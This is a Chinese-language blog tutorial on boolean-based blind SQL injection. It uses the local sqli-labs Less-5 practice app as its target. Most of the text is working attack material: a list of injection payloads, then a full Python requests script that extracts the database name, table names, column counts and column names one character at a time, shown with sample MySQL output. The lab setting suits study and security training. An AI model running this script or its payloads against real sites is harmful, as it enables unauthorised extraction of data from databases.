sql盲注(附python脚本)
前言
写在前面,学sql盲注最麻烦不过对脚本编写,会努力学习算法,代码效率还是太低。
select user(); 取得当前登陆MYsql数据库的账户名字
select top 1:SELECT TOP 子句规定要返回的记录的数目.
1。基于布尔的sql注入
上图是可以通过布尔注入确定出登陆账户名
布尔盲注知识点(Python脚本代码)
布尔注入通过网页的正常反馈信息确定值.
以下是关于几个注入用到函数
- length((select x from x where x ))
- ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101 –+
__(substr(a,b,c) 从b位置开始,截取字符串a的c长度. - ascii(substr((select database(),1,1)))=98
- regexp正则注入(没用到,技术不够,有机会在补)
布尔盲注:
1.猜解数据库长度>>猜解数据库名>>猜解表数>>猜解表长度>>猜解表名>>猜解需要表列个数>>猜解admin表各列的长度>>猜解admin各列的列名>>猜解admin每个列字段数>>猜解每个字段长度>>爆破每个字段值
url=”http://127.0.0.1/sqlilabs/Less-5/?id=1'"
猜解数据库长度
%d=(select length(database()))
猜解数据库名字
%d=ascii(substr(database(),%d,1))
猜解表数
%d=(select count(table_name) from information_schema.tables where table_schema=database())–+
猜解表名长度
%d=length((select table_name from information_schema.tables where table_schema=database() limit %d,1 ))–+’
猜解表名
%d=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1 ),%d,1))–+’
猜解需要表列个数
%d=(select count(column_name) from information_schema.columns where table_name = “%s”)–+
猜解admin表各列的长度
%d=length((select column_name from information_schema.columns where table_name=”users” limit %d,1 ))–+
![]./猜解admin表各列的长度.png)
猜解admin各列的列名
%d=ascii(substr((select column_name from information_schema.columns where table_name=”users” limit %d,1),%d,1))–+
计算每个列的字段数select count(id) from users;
猜解每个字段长度 select length((select id from users limit 0,1))
猜解每个字段值select ascii(substr((select id from users limit 0,1),1,1))
import requests
db_length=1
db_url=''
db_name=''
db_ascii=1
db_place=1
tb_sum=1
tb_url=''
tb_num1=0
tb_lname=0
tb_array=[]
tb_nameasc=0
tb_namenum=0
tb_namepla=0
tb_nameurl=''
tb_name=''
tb_arrayname=[]
#猜解数据库名长度
print('开始猜解数据库名长度')
url="http://127.0.0.1/sqlilabs/Less-5/?id=1'"
for db_length in range(1,100):
db_url=url+'and %d=(select length(database()))--+'%(db_length)
r=requests.get(db_url)
if 'You are in...........' in r.text:
print('[!] '+db_url)
print('猜解结束')
break
else:
print('[x] '+db_url)
print('数据库名长度:%d'%(db_length))
#猜解数据库名
#猜解数据库名ascii(substr(database(),x,1)
print('----------------------------------------------')
print('\n\n正在猜解数据库名.......')
db_urlname='and %d=ascii(substr(database(),%d,1))--+'%(db_ascii,db_place)
for db_place in range(1,db_length+1):
for db_ascii in range(0,127):
db_urlname=url+'and %d=ascii(substr(database(),%d,1))--+'%(db_ascii,db_place)
r=requests.get(db_urlname)
if 'You are in...........' in r.text:
db_name=db_name+chr(db_ascii)
print('[!] '+db_name)
break
else:
continue
print('end.......')
print('数据库名:'+db_name)
#猜解表数 select count(table_name) from information_schema.tables where table_schema='security';
print('\n\n开始猜解表数.......')
for tb_sum in range(1,10):
tb_url=url+'and %d=(select count(table_name) from information_schema.tables where table_schema=database())--+'%(tb_sum)
r=requests.get(tb_url)
if 'You are in...........' in r.text:
print('[!] '+tb_url)
break
else:
print('[x] '+tb_url)
print('猜解表数结束')
print('表数:%d'%(tb_sum))
#猜解表名长度select length((select table_name from information_schema.tables where table_schema=database() limit 0,1 ));
#+-----------------------------------------------------------------------------------------------------+
#| length((select table_name from information_schema.tables where table_schema=database() limit 0,1 )) |
#+-----------------------------------------------------------------------------------------------------+
#| 6 |
# +-----------------------------------------------------------------------------------------------------+
# 1 row in set (0.00 sec)
# mysql> show tables;
# +--------------------+
# | Tables_in_security |
# +--------------------+
# | emails |
# | referers |
# | uagents |
# | users |
# +--------------------+
# 4 rows in set (0.00 sec)
print('\n\n开始猜解每一个表名长度')
for tb_num1 in range(0,tb_sum+1):
for tb_lname in range(1,20):
tb_lengthurl=url+'and %d=length((select table_name from information_schema.tables where table_schema=database() limit %d,1 ))--+'%(tb_lname,tb_num1)
r=requests.get(tb_lengthurl)
if 'You are in...........' in r.text:
tb_array.append(tb_lname)
print('[!] %d'%(tb_lname)+'>>%s'%(tb_lengthurl))
tb_lname=0
break
else:
continue
for i in range(0,len(tb_array)):
print('猜解结束第%d个表名长度分别为:%d'%(i+1,tb_array[i]))
print('猜解各个表名长度结束')
print('\n\n')
#猜解表名 select substr((select table_name from information_schema.tables where table_schema=database() limit 0,1 ),1,1);
print('猜解各个表名开始...........')
for tb_namenum in range(0,tb_sum):
for tb_namepla in range(1,tb_array[tb_namenum]+1):
for tb_nameasc in range(0,128):
tb_nameurl=url+'and %d=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1 ),%d,1))--+'%(tb_nameasc,tb_namenum,tb_namepla)
r=requests.get(tb_nameurl)
if 'You are in...........' in r.text:
tb_name=tb_name+chr(tb_nameasc)
print('[!] '+tb_name)
break
else:
continue
tb_arrayname.append(tb_name)
tb_name=''
print('\n')
for i in range(0,len(tb_arrayname)):
print('猜解结束第%d个表名为:%s'%(i+1,tb_arrayname[i]))
#猜解列个数
cl_osum=[]
print('\n\n开始猜解列个数...........')
for i in range(tb_sum):
for j in range(1,10):
cl_sumurl = url+'and %d=(select count(column_name) from information_schema.columns where table_name = "%s")--+'%(j,tb_arrayname[i])
r=requests.get(cl_sumurl)
if 'You are in...........' in r.text:
cl_osum.append(j)
print('[!] '+cl_sumurl+'>>匹配成功')
break
else:
continue
for i in range(0,tb_sum):
print(tb_arrayname[i]+'列数:%d'%(cl_osum[i]))
print('猜解列个数结束')
#猜解每个表的列数
##mysql> select count(column_name) from information_schema.columns where table_name = 'users' limit 0,1;
#+--------------------+
#| count(column_name) |
#+--------------------+
#| 3 |
#+--------------------+
#1 row in set (0.01 sec)
# for i in range(4):
# for j in range(1,10):
# cl_sumurl = url+'and %d=(select count(column_name) from information_schema.columns where table_name = "%s")--+'%(j,tb_arrayname[i])
# r=requests.get(cl_sumurl)
# if 'You are in...........' in r.text:
# print(tb_arrayname[i]+'的列数为:%d'%(j))
# break
# else:
# continue
cl_lensum=[]
cl_lennam=[]
#计算admin列长度即可
for j in range(0,4):
for l in range(1,20):
cl_len=url+'and %d=length((select column_name from information_schema.columns where table_name="users" limit %d,1 ))--+'%(l,j)
r= requests.get(cl_len)
if 'You are in...........' in r.text:
cl_lennam.append(l)
print('users>>第%d列长度为:%d'%(j+1,l))
break
else:
continue
print('\n')
print(cl_lennam)
#猜解列名
#select ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1));
#+-------------------------------------------------------------------------------------------------------------+
#| ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)) |
#+-------------------------------------------------------------------------------------------------------------+
#| 105 |
#+-------------------------------------------------------------------------------------------------------------+
#1 row in set (0.01 sec)
#想知道users表的3列的各个列名
cl_name=''
cl_namearr=[]
for j in range(0,3):
for i in range(cl_lennam[j]+1):
for cl_ascii in range(0,128):
cl_admin=url+'and %d=ascii(substr((select column_name from information_schema.columns where table_name="users" limit %d,1),%d,1))--+'%(cl_ascii,j,i)
r= requests.get(cl_admin)
if 'You are in' in r.text:
cl_name=cl_name+chr(cl_ascii)
print('[~]'+cl_name)
break
else:
continue
cl_name=cl_name.strip('\x00')
cl_namearr.append(cl_name)
cl_name=''
print('\n')
print(cl_namearr)本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!